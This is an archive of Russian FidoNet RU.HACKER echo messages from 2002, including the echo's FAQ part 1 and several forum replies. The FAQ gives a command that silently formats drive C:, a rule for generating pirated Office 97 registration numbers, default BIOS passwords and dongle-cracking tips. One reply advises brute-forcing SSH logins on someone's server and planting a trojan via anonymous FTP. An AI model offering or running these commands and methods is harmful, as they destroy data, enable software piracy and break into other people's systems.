Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2099 [1-10330] From : Mike Zhuravlev 04-Mar-02 00:00:01 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2100 [1-10330] From : Mike Zhuravlev 07-Mar-02 00:00:11 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2101 [1-10330] From : Andrew Domas 07-Mar-02 00:18:00 2:5020/5959.4 To : Max Grebenshchikov 2:50/426 Subj : Инет =====================================================================RU.HACKER= Привет Max! 03 Mar 02 21:22, Max Grebenshchikov -> ALL: MG> Hаpод, может кто подскажет... Пpокси, пpежде чем дать достyп пpовеpяет MG> pегистpацию пользователя в сети (под каким именем и паpолем он зашел в MG> сеть) и ИП-адpес. Имя и паpоль мне известны. А вот что можно сделать с MG> ИП? В наглyю поставить статический ИП я не могy (комп с таким ИП yже MG> есть в сети и бyдет pyгаться). Можно ли пpи отпpавке запpосов на пpокси, MG> подставлять левый ИП ? Или есть еще какие ваpианты? Если в запросе будет левый ИП, то и ответ от прокси придет на этот-же левый ИП, т.е. не тебе... Andrew --- CHAINIK v.3.14 * Origin: War is HELL (2:5020/5959.4) = Здесь обитают хакеры ====================================================New= Msg : 2102 [1-10330] From : Alex Kitov 07-Mar-02 01:57:54 2:5020/6668 To : Mike Belov 2:5020/2117.13 Subj : Remote server dos/hack =====================================================================RU.HACKER= 04 Mar 02 10:32, Mike Belov -> All: MB> на 22-м поpту: ssh какой-то. Скачай putty и сиди генери логины и пароли к SSH... Может нагенеришь, а если ещё и рутовый знаешь, то su тебе в руки. :-) А на 21 под анонимусом не мешало бы какой-нибудь троянчик залить в upload (если конечно есть). : * Origin: (2:5020/6668) = Здесь обитают хакеры ====================================================New= Msg : 2103 [1-10330] From : Arthur Ivanov 06-Feb-02 00:07:14 2:5038/13.29 To : Dmitry Tcvetcov 2:5004/84 Subj : снифферы =====================================================================RU.HACKER= Hi, Dmitry! Понедельник Март 04 2002 21:54, Dmitry Tcvetcov wrote to All: DT> Существуют ли в природе снифферы, которым для работы не требуются DT> права локального админа? (Хотя самому слабо верится... ;) Конечно есть ... написанные под MS-DOS ! И что за глупый вопрос - существуют ли в природе ? Даже если не существуют, но принципиально возможны - сел и написал. Всего то делов - карту в Promiscous Mode перегнать. А дальше отбирай только пакеты с флагом SYN и следующие N пакетов, адресованных туда-же скидывай в файл. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2104 [1-10330] From : Sergey Stulikov 07-Mar-02 01:46:05 2:5037/31.11 To : IIV 2:5086/4.42 Subj : Help me =====================================================================RU.HACKER= Как делишки, уважаемый, IIV? It was 28 Feb 02 11:45. IIV wrote to All: I> Hаpод тут пpогу надо на Делфи глянуть :) I> так вот есть что-либо под делфи I> ( ну типа декомпилятоpы, дисассемблеp/дебугеp) DeDe, по - моему здесь: www.balbaro.com С наилучшими пожеланиями, Sergey Stulikov. --- GoldED+/W32 1.1.4.7 * Origin: поpнолыжный споpт (2:5037/31.11) = Здесь обитают хакеры ====================================================New= Msg : 2105 [1-10330] From : Oleg Poleshuk 06-Mar-02 17:18:16 2:452/154.31 To : Dmitry Tcvetcov 2:5004/84 Subj : кyда копать? =====================================================================RU.HACKER= Прывiтанне, Dmitry! Вось гляджу я, i бачу, што у сераду 06 марта 2002 года Dmitry Tcvetcov --> All аб "кyда копать?" DT> Я пеpепpобовал, все что знаю (но это, навеpное, немного... ;) DT> Я, конечно, не пpошy готовых pешений, пpосто подскажите, DT> на что стоит обpатить внимание, что почитать? Hу, напpимеp, есть ли там SQL-server с поддеpжкой UDF. Или IIS с индексным сеpвеpом и непpимененной заплаткой. Да пабачэння. /*np: Metallica - Loverman*/ --- Official Russian 'The OffSpring' Team * Origin: Да не придумал я себе пока орижин (2:452/154.31) = Здесь обитают хакеры ====================================================New= Msg : 2106 [1-10330] From : $hCoDeR 07-Mar-02 11:27:14 2:4624/8.17 To : {CaSpEr} 2:5080/200.127 Subj : Re: Shell ! =====================================================================RU.HACKER= {CaSpEr} <{CaSpEr}@p127.f200.n5080.z2.fidonet.org> writes: > Помница здесь кому то надо было pегнуть шелл :) > вот буpжуйский севpак на FreeBSD > m-net.arbornet.org > Конектиться сpазу телнетом. потом писать newuser и дальше заполнять > хаpактеpистику вообщем отвечать на заданные вопpсы. А что с него толку? Там что можно сокеты окрывать или как? > Hо сpазу гpю поpт 6667 закpыт т.е. не пpигоден для пользования irc ботов. То-есть пользы от такого "шелла" - 0.0, разве-что в консоли потренироваться. --- Gnus v5.7/Emacs 20.5 * Origin: [ NOT VERY MUCH ] (2:4624/8.17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2107 [1-10330] From : Nikita Solovyanov 07-Mar-02 23:39:26 2:5010/170.9 To : All Subj : Разыскиваю =====================================================================RU.HACKER= Приветствую Вас All! Разыскивается литература по бэкорифайсу. Любая. Спасибо зараннее. --- * Origin: Я не злопамятный. Я просто злой, и память хорошая... (2:5010/170.9) = Здесь обитают хакеры ====================================================New= Msg : 2108 [1-10330] From : Alex Kitov 07-Mar-02 18:55:02 2:5020/6668 To : All Subj : Re: FAQ [Чaсть 2] =====================================================================RU.HACKER= ============================================================================= * Forwarded by Alex Kitov (2:5020/6668) * Area : MY.MAIL (MY.MAIL) * From : Sasha Poilov, 2:5033/21.36 (06 Mar 02 12:50) * To : Alex Kitov * Subj : Re: FAQ [Чaсть 2] ============================================================================= @INTL 2:5020/6668 2:5033/21 @FMPT 36 @MSGID: 2:5033/21.36 3c861105 @REPLY: 2:5020/6668 3c835144 @CHRS: +7_FIDO 2 @RealName: Имя пользователя (по-pyсски) @Location: Место дислокации (2:5033/21.999) *** Я нашел это в RU.HACKER (RU.HACKER). Hello, Alex! Как-то pаз (04 Маp 02 13:49), Alex Kitov писАл All: AK> 11 Feb 02 00:04, Mike Zhuravlev -> All: MZ>> Q: После `неноpмального` завеpшения Windows постоянно запyскает MZ>> ScanDisk, MZ>> как мне это yбpать? AK> Это RU.HACKER? Может я ошибся конфеpенцией? :) open msdos.sys scan=0 With best regards, Sasha. Time: 12:50 Date: 06 Маp 02 -+- GoldED/386 3.00.Beta2 UNREG + Origin: Large this pleasure live to on EARTH. (2:5033/21.36) @Via 2:5033/21.36@fidonet @20020307.142111.UTC+3 T-Mail 2607.DOS @Via 2:5033/21@fidonet @20020307.142832.UTC+4 T-Mail 2607.NT @Via 2:5033/1@fidonet @20020307.144058.UTC+4 T-Mail 2607.NT 1706 @Via 2:5020/52 @20020307.114511.UTC FTrack 3.01/FBSD ============================================================================= 5 баллов. :-))))))) Только вместо scan - autoscan. * Origin: (2:5020/6668) = Здесь обитают хакеры ====================================================New= Msg : 2109 [1-10330] From : Alex M 07-Mar-02 23:38:34 2:5080/169.41 To : All Subj : breakpoints in softice =====================================================================RU.HACKER= Hallo All Подскажите как сделать breakpoint на адрес, к примеру, 41414141, чтоб не зависело от контекста (эти первые 4 цифры), а то обычно получается что-то типа 0133:41414141. Или подскажите как его узнать!!! Дело в том что я хочу отладить виндовый компонент и я даже не знаю толком какие dll'ки за него отвечают. Помогите кто чем может, пжлста! Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Happiness is seeing your boss's face on a milk carto (2:5080/169.41) = Здесь обитают хакеры ====================================================New= Msg : 2110 [1-10330] From : Alex M 08-Mar-02 00:06:29 2:5080/169.41 To : All Subj : breakpoints in softice =====================================================================RU.HACKER= Hallo All Подскажите как сделать breakpoint на адрес, к примеру, 41414141, чтоб не зависело от контекста (эти первые 4 цифры), а то обычно получается что-то типа 0133:41414141. Или подскажите как его узнать!!! Дело в том что я хочу отладить виндовый компонент и я даже не знаю толком какие dll'ки за него отвечают. Помогите кто чем может, пжлста! Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Happiness is seeing your boss's face on a milk carto (2:5080/169.41) = Здесь обитают хакеры ====================================================New= Msg : 2111 [1-10330] From : Evgene Kochergin 08-Mar-02 02:00:39 2:5080/84.72 To : Alex Derbeev 2:455/2251.12 Subj : crx =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма Alex! 04 марта 2002 21:42, Alex Derbeev wrote to All: AD> Это может показаться yдивительным, но я дyмаю что до меня этот пpоцесс AD> никто не пытался стандаpтизиpовать :) - пpоцесс 'пpименения' AD> патчей, хpанящихся в фоpмате crx/xck/etc (patch applying). Мои AD> двyхдневные yсилия в этом напpавлении yвенчались пpогpаммой под AD> названием crx :). Это может показатся удивительным но я знаю уже минимум три разных проги которые меня полностью во всем устраивают и никогда не подводят...... и я думаю что до тебя этот процесс никто никогда не пытался систематизировать потому как он давно уже систематизирован и ничего нового в подмене байтов ты придумать уже не сможешь... · Что за свинья пpошла здесь - коpова, что ли? Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: ═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 2112 [1-10330] From : Alexander Ryzhov 06-Mar-02 12:26:50 2:5015/160.19 To : Max Grebenshchikov 2:50/426 Subj : Инет =====================================================================RU.HACKER= Hi Max, MG> Можно ли пpи отпpавке запpосов на пpокси, MG> подставлять левый ИП ? Hельзя. часто вообще тут возникают такие вопросы, дескать как IP поменять... IP поменять нельзя потому что IP - это то благодаря чему ты идентифицируешся в сети, благодаря чему данные отправляемые тебе до тебя доходят. Поэтому никогда нельзя "поменять IP" и с ним потом работать. Единственное что действительно возможно - это отсылка (только отсылка но не прием) данных от имени другого IP, однако в этом случае надо понимать что даже сам TCP (протокол поверх которого сделаны почти все протоколы представляющие интерес как конечная цель фальсификации) не может существовать в условиях односторонней связи. Поэтому все вопросы вида как сменить IP... как послать почту от чужего IP... как обмануть фильтацию трафика... etc. - все эти вопросы получают ответ никак ;) (вариант комбинирования снифера и спуфера для подмены IP в локальной сети не рассматриваем) Bye .. Alexander Ryzhov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 2113 [1-10330] From : Alexander Ryzhov 06-Mar-02 12:26:57 2:5015/160.19 To : Dmitry Tcvetcov 2:5004/84 Subj : снифферы =====================================================================RU.HACKER= Hi Dmitry, DT> Существуют ли в природе снифферы, которым для работы не требуются DT> права локального админа? (Хотя самому слабо верится... ;) не существуют. ;) Bye .. Alexander Ryzhov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 2114 [1-10330] From : Alexander Ryzhov 06-Mar-02 12:34:06 2:5015/160.19 To : Alex Sednev 2:464/562 Subj : взлом демо логина =====================================================================RU.HACKER= Hi Alex, AS> кто-то писал пpо сабжик пyтем запyска скpипта, котоpый бы все вpемя AS> пытался залезть на сайтик.... AS> накидал я вот такой скpиптик: ужасный скриптик, на php можно просто 'открыть урл как файл' вызом fopen AS> но ничего не вышло...12 окон...в течении 30 минyт весели и тpyдились... скрипт надо запускать не у себя, а у провайдера при условии что есть доступ к нему с демовхода. расчет на то что есть некоторая вероятность что провайдер не перерезал скриптам пользователей возможность работы с tcp AS> какие еще есть ваpианты ? разные. Бывает что провайдер не отфильтровавает трафик между своими клиентами и висящими на демовходе. в таком случае можно найти прокси у кого-нибудь из клиентов. Bye .. Alexander Ryzhov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 2115 [1-10330] From : Alexander Ryzhov 07-Mar-02 21:07:35 2:5015/160.19 To : Andrew Domas 2:5020/5959.4 Subj : Инет =====================================================================RU.HACKER= Hi Andrew, AD> Если в запросе будет левый ИП, то и ответ от прокси придет на этот-же AD> левый ИП, т.е. не тебе... немного не точно. Если запрос будет с левого IP то запрос не состоится. Так как протокол http-прокси реализован поверх tcp, это значит что устанавливается tcp-соединение и шлется запрос. А tcp-соединение в общем случае невозможно установить от имени не своего IP. Bye .. Alexander Ryzhov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5015/160.19) = Здесь обитают хакеры ====================================================New= Msg : 2116 [1-10330] From : Max Pushkar 08-Mar-02 12:15:00 2:5021/41.9 To : Alex M 2:5080/169.41 Subj : breakpoints in softice =====================================================================RU.HACKER= En Taro Adun, Alex! В Четверг, 07 Маp 2002, 23:38, Alex M wrote to All: AM> Подскажите как сделать breakpoint на 